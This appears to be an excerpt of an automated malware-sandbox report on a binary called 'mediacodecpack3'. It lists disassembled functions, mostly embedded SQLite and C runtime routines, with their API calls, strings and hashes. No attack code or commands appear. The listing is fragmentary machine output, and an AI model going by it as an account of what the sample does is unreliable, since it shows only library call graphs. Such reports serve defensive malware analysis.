                                                                                            • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                            • API String ID: 0-780898
                                                                                            • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                            • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                            • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                            • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                            • API String ID: 0-2604012851
                                                                                            • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                            • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                            • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                            • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                            APIs
                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00408640,00000001,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 00406409
                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,0040863C,00000001,00000000,00000000,?,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406425
                                                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405E87,?,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 0040646E
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 004064A6
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004064FE
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 00406514
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00405E87,00000000,00405E87,?,?,00405E87,00200020,00000000,?,00000000), ref: 00406547
                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004065AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 352835431-0
                                                                                            • Opcode ID: 9c7cee020c542fb800dbf7d144ed3697215e486a5166d3a559f4f8a108ac6f85
                                                                                            • Instruction ID: d42c4ff00bdcea80f115aa50461d5d245c16a81543514470c81a73783c2cd3a2
                                                                                            • Opcode Fuzzy Hash: 9c7cee020c542fb800dbf7d144ed3697215e486a5166d3a559f4f8a108ac6f85
                                                                                            • Instruction Fuzzy Hash: 4A517B71900209FFCF229F58DD49A9F7BB9FB48750F11413AF912B12A0D7398961DBA8
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                                            • String ID: 0$SQLite format 3
                                                                                            • API String ID: 3174206576-3388949527
                                                                                            • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                            • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                                            • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                            • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                            • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                              • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                              • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                            • String ID: |
                                                                                            • API String ID: 1576672187-2343686810
                                                                                            • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                                            • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                            • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                                            • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                            APIs
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                              • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                            • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                            • API String ID: 652164897-1572359634
                                                                                            • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                                            • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                            • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                                            • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E3A
                                                                                            • GetStdHandle.KERNEL32(000000F4,00408574,00000000,?,00000000,00000000), ref: 00403F10
                                                                                            • WriteFile.KERNEL32(00000000), ref: 00403F17
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                            • API String ID: 3784150691-4022980321
                                                                                            • Opcode ID: 04cfe4ace2dd9675a620efbbcb8461293764693c9a36d9750f915388fa73d055
                                                                                            • Instruction ID: 1325ef8c40c3fac29ee6baa2b36e74f90486e8040fe1898f7fb10d69898ee010
                                                                                            • Opcode Fuzzy Hash: 04cfe4ace2dd9675a620efbbcb8461293764693c9a36d9750f915388fa73d055
                                                                                            • Instruction Fuzzy Hash: 3331C172A002186FDF24EA60DE4AFEA776CAB45304F10057FF584F61D1DAB8AE448A5D
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                            • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                            • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 2352520524-0
                                                                                            • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                                            • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                            • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                                            • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                            APIs
                                                                                              • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                              • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                              • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                              • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                              • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                              • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                            • String ID: optimize
                                                                                            • API String ID: 3659050757-3797040228
                                                                                            • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                            • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                            • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                            • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                            APIs
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                            • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                            • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                            • sqlite3_free.SQLITE3 ref: 60965714
                                                                                            • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 2722129401-0
                                                                                            • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                            • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                            • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                            • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                              • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                            • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                              • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                            • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                            • sqlite3_free.SQLITE3 ref: 60964783
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 571598680-0
                                                                                            • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                            • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                            • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                            • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040372D
                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 00403741
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040376D
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037A5
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037C7
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037E0
                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 004037F3
                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403831
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1823725401-0
                                                                                            • Opcode ID: 7f1ee2c931afbeb2bcd72820eb8f065979dd47f7a99393091ec5d7620f58e433
                                                                                            • Instruction ID: 45b108152198534a65e95edcfca0b8ba0a54c8eec5aa0c4c05c1d64ec2385aa0
                                                                                            • Opcode Fuzzy Hash: 7f1ee2c931afbeb2bcd72820eb8f065979dd47f7a99393091ec5d7620f58e433
                                                                                            • Instruction Fuzzy Hash: 2131D2F35082619ED7203F745DC483BBE9CEA4530A715453FF981F3280DA795D4286A9
                                                                                            APIs
                                                                                            • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                              • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                            • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                            • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                            • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                            • sqlite3_free.SQLITE3 ref: 60963621
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                            • String ID:
                                                                                            • API String ID: 4276469440-0
                                                                                            • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                            • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                            • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                            • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                            Strings
                                                                                            • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                            • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                            • API String ID: 4080917175-264706735
                                                                                            • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                            • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                            • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                            • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                            APIs
                                                                                              • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                            • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                            • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: library routine called out of sequence$out of memory
                                                                                            • API String ID: 2019783549-3029887290
